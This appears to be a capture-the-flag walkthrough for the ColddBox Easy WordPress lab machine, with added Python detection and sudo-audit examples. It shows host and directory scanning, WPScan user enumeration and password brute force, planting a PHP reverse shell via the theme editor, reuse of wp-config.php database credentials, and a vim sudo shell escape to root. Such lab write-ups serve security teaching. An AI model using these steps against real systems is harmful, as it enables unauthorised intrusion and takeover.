Colddbox

ColddBox Easy is a WordPress machine of easy difficulty, highly recommended for beginners in the field.

1. Reconnaissance

  • Scanning the network with a ping sweep to find the vulnerable machine's IP

nmap -sn 192.168.10.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:06 IST
Nmap scan report for 192.168.10.1
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.2
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.3
Host is up (0.0018s latency).
MAC Address: 08:00:27:1C:76:C3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.12
Host is up (0.0014s latency).
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.11
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds
  • We find the IP of the vulnerable machine to be 192.168.10.12

2. Scanning

2.1 Nmap

  • Using nmap to find the open ports and their services

nmap -p- -sV 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:08 IST
Nmap scan report for 192.168.10.12
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.21 seconds
  • We find two open TCP ports: 80 running a web server (Apache httpd 2.4.18) and 4512 running SSH (OpenSSH 7.2p2) on a non-standard port

2.2 Directory Enumeration

  • Brute-forcing directories with gobuster to find any hidden directories

gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://192.168.10.12
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.12
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/17 10:15:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/hidden               (Status: 301) [Size: 315] [--> http://192.168.10.12/hidden/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.10.12/]         
/server-status        (Status: 403) [Size: 278]                                   
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.10.12/wp-admin/]
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.10.12/wp-content/]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.10.12/wp-includes/]
/xmlrpc.php           (Status: 200) [Size: 42]                                         
                                                                                       
===============================================================
2022/03/17 10:15:27 Finished
===============================================================
  • We find the directories wp-admin, wp-content and wp-includes, and enumerating further with Wappalyzer confirms that it is a WordPress site.

3. Initial Foothold

3.1 WPScan

  1. To enumerate the WordPress users we use -eu (enumerate users)

wpscan -eu --url http://192.168.10.12
_______________________________________________________________

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
---------------------------------------------------------------------------------

[+] Finished: Thu Mar 17 18:24:39 2022
[+] Requests Done: 16
[+] Cached Requests: 48
[+] Data Sent: 4.363 KB
[+] Data Received: 18.32 KB
[+] Memory used: 179.02 MB
[+] Elapsed time: 00:00:02
  • We get 4 potential usernames:
    • the cold in person
    • c0ldd
    • hugo
    • philip

  2. Brute-forcing the passwords of the enumerated users with the rockyou.txt word list using -P

wpscan -P /usr/share/wordlists/rockyou.txt --url http://192.168.10.12
_______________________________________________________________

[!] Valid Combinations Found:
 | Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output..02%  ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 18:31:57 2022
[+] Requests Done: 12140
[+] Cached Requests: 18
[+] Data Sent: 5.035 MB
[+] Data Received: 43.984 MB
[+] Memory used: 298.348 MB
[+] Elapsed time: 00:02:55

We get c0ldd : 9876543210

  3. Using these credentials, we can log in to the wp-admin page and add a PHP reverse shell to the theme's header template through Appearance > Editor, where the URL is http://192.168.10.12/wp-admin/theme-editor.php?file=header.php&theme=twentyfifteen

    • Using the reverse shell /usr/share/webshells/php/php-reverse-shell.php, appending it to the header template and editing it to use port 9001

    • Starting a listener with nc -lvnp 9001

    • Navigating to the Header tab under Appearance loads the modified template and triggers the reverse shell.
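Added defender's example (not part of the original writeup): detection logic run over constructed Apache combined-log lines that approximate the traffic this foothold chain produces, namely the author-ID probing WPScan uses for user enumeration, the POST flood against wp-login.php from the password brute force, and the write through wp-admin/theme-editor.php that plants the reverse shell. The log lines, the thresholds and the shortened WPScan user-agent string are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format (assumed as the server's log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def log_line(ip, method, target, status, ua):
    """Build one constructed combined-log line (sample data, not a real capture)."""
    return (f'{ip} - - [17/Mar/2022:18:24:38 +0530] "{method} {target} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

ATTACKER, SCANNER_UA = "192.168.10.11", "WPScan v3.8.20"   # constructed values
# Constructed sample: author-ID probing, a password brute force on wp-login.php,
# one edit through the theme editor, and benign traffic from another host.
SAMPLE = (
    [log_line(ATTACKER, "GET", f"/?author={i}", 301, SCANNER_UA) for i in range(1, 11)]
    + [log_line(ATTACKER, "POST", "/wp-login.php", 200, SCANNER_UA) for _ in range(40)]
    + [log_line(ATTACKER, "POST", "/wp-admin/theme-editor.php", 302, "Mozilla/5.0")]
    + [log_line("192.168.10.3", "GET", "/?p=1", 200, "Mozilla/5.0")]
)

def analyse(lines, author_min=5, login_min=20):
    """Return sorted (ip, rule) findings for the WordPress attack chain above."""
    authors, logins, findings = defaultdict(set), Counter(), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined-log format; skip
        ip, method, ua = m["ip"], m["method"], m["ua"]
        url = urlsplit(m["target"])
        ids = parse_qs(url.query).get("author")
        if ids:                           # /?author=N probes enumerate usernames
            authors[ip].update(ids)
        if method == "POST" and url.path.endswith("/wp-login.php"):
            logins[ip] += 1               # each POST is one password attempt
        if method == "POST" and url.path.endswith("/wp-admin/theme-editor.php"):
            findings.add((ip, "theme-file-edit"))   # code written via the theme editor
        if ua.lower().startswith("wpscan"):          # trivially spoofable, but cheap
            findings.add((ip, "wpscan-user-agent"))
    findings |= {(ip, "author-id-enumeration") for ip, s in authors.items() if len(s) >= author_min}
    findings |= {(ip, "wp-login-bruteforce") for ip, n in logins.items() if n >= login_min}
    return sorted(findings)
```

The theme-file-edit rule is the one worth alerting on regardless of volume: a single POST to theme-editor.php by an admin account is exactly how the shell was planted, and disabling the file editor (DISALLOW_FILE_EDIT in wp-config.php) removes that path entirely.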

4. Privilege Escalation

4.1 wp-config.php

  • Stabilizing the shell using python3 -c 'import pty;pty.spawn("/bin/bash")'

  • We are the user www-data

  • Enumerating the current directory we find a wp-config.php file in /var/www/html

cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You dont have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

---------------------------------------------------------------------------------

We find the database to be MySQL with c0ldd : cybersecurity as the login credentials, which we try against the local user of the same name in case the password is reused.

4.2 Escalation

  1. c0ldd

  • Using the database credentials to log in as the user c0ldd

su c0ldd
Password: cybersecurity

c0ldd@ColddBox-Easy:~$ ls
user.txt
  • user.txt

c0ldd@ColddBox-Easy:~$ cat user.txt
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==

echo 'RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==' | base64 -d
Felicidades, primer nivel conseguido!
  2. Root

  • Using sudo -l, we find c0ldd can run these commands as root:

c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd: cybersecurity

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
  • Using the sudo privilege-escalation entry for vim from GTFOBins: sudo vim -c ':!/bin/sh'

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'

:!/bin/sh
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ColddBox-Easy:~
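Added hardening example (not part of the original writeup): a small audit that parses `sudo -l` output, including the Spanish-locale header seen on this box, and flags entries such as the three above that hand root to any user who can launch the program. The risky-binary table and the harmless extra entry in the sample are assumptions.

```python
import re

# Minimal, hypothetical table of binaries a sudo audit should flag: each can be
# used from a sudo entry to reach a root shell or alter root-owned files.
RISKY = {
    "vim": "interactive editor with a shell escape",
    "vi": "interactive editor with a shell escape",
    "ftp": "interactive client with a shell escape",
    "chmod": "changes permissions of arbitrary files as root",
}

# `sudo -l` prints the command list after a locale-dependent header; the English
# and Spanish (as on the target box) variants are handled here.
HEADER_RE = re.compile(r"may run the following commands|puede ejecutar los siguientes comandos")
# Entries look like "(root) NOPASSWD: /usr/bin/vim" or "(root) /bin/chmod".
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

def audit_sudo_l(output):
    """Return (runas, command, reason) for every risky entry in `sudo -l` output."""
    findings, in_commands = [], False
    for line in output.splitlines():
        if HEADER_RE.search(line):
            in_commands = True            # everything after this line is an entry
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if not m:
            continue                      # defaults block or blank line; skip
        runas, cmd = m["runas"].strip(), m["cmd"]
        name = cmd.rsplit("/", 1)[-1]
        if name in RISKY and ("root" in runas or "ALL" in runas):
            findings.append((runas, cmd, RISKY[name]))
    return findings

# Constructed sample: the entries shown on this page plus one harmless entry.
SAMPLE_SUDO_L = """\
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/id
"""
```

The remediation for flagged entries is to remove them or replace them with a purpose-built wrapper (sudoedit instead of vim, a script that chmods one fixed path instead of chmod), since argument restrictions alone do not stop an interactive editor from spawning a shell.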
  • root.txt

root@ColddBox-Easy: cd /root
root@ColddBox-Easy:/root ls
root.txt
root@ColddBox-Easy:/root cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
echo 'wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=' | base64 -d
¡Felicidades, máquina completada!